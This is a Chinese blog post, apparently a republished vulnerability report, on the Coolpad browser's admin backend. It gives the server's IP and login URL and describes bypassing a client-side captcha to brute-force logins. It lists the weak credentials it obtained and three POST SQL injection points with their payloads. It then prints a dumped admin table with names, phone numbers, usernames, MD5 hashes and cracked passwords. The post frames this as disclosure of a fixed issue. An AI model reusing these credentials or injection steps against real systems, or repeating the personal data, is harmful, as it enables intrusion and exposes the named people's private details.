酷派浏览器管理后台多处漏洞

作者: Luan 分类: 渗透测试 发布时间: 2017-03-30 20:03

官方已经修复,我把思路分享一下。其实很常规,很辣鸡没水平大牛勿喷,root注入都拿不到shell。

发现能直接复制粘贴,以下是原文,连 图片地址都是的 :

 

提交时间: 2016年7月28日 07:01

漏洞评分: 6

 

酷派浏览器管理后台登录地址:

http://113.142.37.234:8080/

1,验证码JS验证,可绕过验证码进行爆破。

2,爆破得到弱口令账户:

liming liming
zhangzheng zhangzheng

(昨天爆破的,忘记截图了)

3,使用权限较高的账户zhangzheng登录后,发现后台存在多处POST类型SQL注入漏洞:

http://113.142.37.234:8080/kpadmin.php?c=Game&a=gameList

POST:keywords=%27&submits=1

http://113.142.37.234:8080/kpadmin.php?c=Content&a=listContent

POST:con_title=%27&cate_id=all&con_show=all&con_recommend=all&submits=1

http://113.142.37.234:8080/kpadmin.php?c=Content&a=searchkeys

POST:keywords=%27&submits=1

注入点ROOT权限:

可读/etc/passwd文件:

用SQLMAP跑出用户表,发现都是弱口令啊:

Table: admin_user
[9 entries]
+—-+———+———-+————+————-+———+————–+———————————————–+———-+————+————-+————-+
| id | role_id | group_id | name       | mobile      | last_ip | username     | password                                      | nav_list | last_time  | action_list | create_time |
+—-+———+———-+————+————-+———+————–+———————————————–+———-+————+————-+————-+
| 2  | NULL    | 1        | 韩上海     | 18610905643 | <blank> | han          | 075afa2c290b0c2398909bfef308479d              | NULL     | 1461591611 | NULL        | 0           |
| 7  | NULL    | 1        | 李立名     | 18610905643 | NULL    | liming       | bc6a4e700fca7eb9615d8fa1e111ffdf (liming)     | NULL     | 1461561739 | NULL        | 1458340876  |
| 8  | NULL    | 1        | kupai      | 18601122863 | NULL    | kupai        | 34f6c763df4e23bb1023ec9d9c3e3789 (kupai)      | NULL     | 1462986075 | NULL        | 1459302124  |
| 14 | NULL    | 4        | 组         | 18601002144 | NULL    | zhangzongfei | e10adc3949ba59abbe56e057f20f883e (123456)     | NULL     | 1463217804 | NULL        | 1463217804  |
| 19 | NULL    | 7        | kupai      | 18601002144 | NULL    | kupai        | 34f6c763df4e23bb1023ec9d9c3e3789 (kupai)      | NULL     | 1463728755 | NULL        | 1463728597  |
| 20 | NULL    | 8        | zhangsan   | 18601002144 | NULL    | laozhang     | 4297f44b13955235245b2497399d7a93 (123123)     | NULL     | 1463728997 | NULL        | 1463728997  |
| 22 | NULL    | 11       | guokai     | <blank>     | NULL    | guokai       | 3edc1c9c956eeffec59a980f07d639f6              | NULL     | 1464319898 | NULL        | 1464319898  |
| 23 | NULL    | 12       | zhangzheng | <blank>     | NULL    | zhangzheng   | 74ccc3626775085243c3158ac4d05d2a (zhangzheng) | NULL     | 1464588248 | NULL        | 1464587578  |
| 24 | NULL    | 12       | zongfei    | 111         | NULL    | zongfei      | 4732fd6e95dcc765099b33a8a24e9ec3 (zongfei)    | NULL     | 1466995831 | NULL        | 1466995831  |
+—-+———+———-+————+————-+———+————–+———————————————–+———-+————+————-+————-+

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论